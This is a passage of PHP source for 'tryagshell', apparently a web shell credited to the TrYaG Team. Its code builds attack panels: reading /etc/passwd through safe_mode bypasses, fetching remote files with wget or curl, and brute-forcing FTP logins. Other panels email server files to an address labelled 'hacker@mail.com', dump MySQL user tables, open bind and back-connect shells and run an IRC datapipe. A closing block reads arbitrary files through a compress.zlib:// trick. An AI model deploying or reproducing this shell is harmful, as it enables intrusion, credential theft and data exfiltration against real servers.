2284 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2285 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2286 echo $te.'</div>'.$table_end1.$fe;
2287 }
2288 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2289 echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
2290 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2291 echo $te.'</div>'.$table_end1.$fe;
2292 }
2293 if($safe_mode&&function_exists('imap_list')){
2294 echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
2295 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2296 echo $te.'</div>'.$table_end1.$fe;
2297 }
2298 if($safe_mode&&function_exists('imap_body')){
2299 echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
2300 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2301 echo $te.'</div>'.$table_end1.$fe;
2302 }
2303 if(@ini_get('file_uploads')){
2304 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2305 echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
2306 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2307 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2308 echo $te.'</div>'.$table_end1.$fe;
2309 }
2310 if(!$safe_mode&&!$windows){
2311 echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
2312 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2313 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2314 echo $te.'</div>'.$table_end1.$fe;
2315 }
2316 echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
2317 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2318 $arh = $lang[$language.'_text92'];
2319 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
2320 if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2321 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2322 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2323 echo $te.'</div>'.$table_end1.$fe;
2324 if(@function_exists("ftp_connect")){
2325 echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2326 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2327 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2328 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2329 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2330 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2331 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2332 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2333 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2334 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2335 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2336 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2337 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2338 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2339 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2340 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2341 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2342 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2343 echo $te."</td>".$fe."</tr></div></table>";
2344 }
2345 if($unix && @function_exists("ftp_connect")){
2346 echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
2347 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2348 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2349 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2350 echo $te.'</div>'.$table_end1.$fe;
2351 }
2352 if(@function_exists("mail")){
2353 echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2354 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2355 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2356 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2357 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2358 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2359 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2360 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2361 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2362 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2363 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2364 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from tryagshell"))));
2365 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2366 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
2367 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2368 echo $te."</td>".$fe."</tr></div></table>";
2369 }
2370 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2371 {
2372 $select = '<select name=db>';
2373 if($mysql_on) $select .= '<option>MySQL</option>';
2374 if($mssql_on) $select .= '<option>MSSQL</option>';
2375 if($pg_on)    $select .= '<option>PostgreSQL</option>';
2376 if($ora_on)   $select .= '<option>Oracle</option>';
2377 $select .= '</select>';
2378 echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2379 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2380 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2381 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2382 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2383 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2384 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2385 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2386 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2387 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2388 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2389 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2390 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2391 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2392 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2393 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2394 }
2395 if(!$safe_mode&&!$windows){
2396 echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2397 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2398 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2399 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'tryag'));
2400 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2401 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2402 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2403 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2404 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2405 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2406 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2407 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2408 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2409 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2410 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2411 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2412 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2413 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2414 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2415 echo $te."</td>".$fe."</tr></div></table>";
2416 }
2417 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ tryagshell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2418 $u1p=""; // File to Include... or use _GET _POST
2419 $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
2420 echo "<PRE>\n";
2421 if(empty($u1p)){
2422 if(empty($_GET['u1p'])){
2423 if(empty($_POST['u1p'])){
2424 die("<table Width='100%' height='7%' bgcolor='#8C0404' border='1'>
2425 <tr>
2426 <td><center><font size='3' color='#BBB516'> By  * Mohajer22-TrYaG Team * * <a href=http://www.tryag.com>http://www.tryag.com</a> | <a href=http://www.dwrat.com>http://www.dwrat.com</a></center></td>
2427 </tr>
2428 </table></FONT>");
2429 } else {
2430 $u1p=$_POST['u1p'];
2431 }
2432 } else {
2433 $u1p=$_GET['u1p'];
2434 }
2435 }
2436 $temp=tempnam($tymczas, "cx");
2437 if(copy("compress.zlib://".$u1p, $temp)){
2438 $zrodlo = fopen($temp, "r");
2439 $tekst = fread($zrodlo, filesize($temp));
2440 fclose($zrodlo);
2441 echo "".htmlspecialchars($tekst)."";
2442 unlink($temp);
2443 } else {
2444 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
2445 <B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
2446 access.</CENTER></FONT>");
2447 }
2448 ?>

Tryagshell v1.3 screenshot

tryagshell screenshot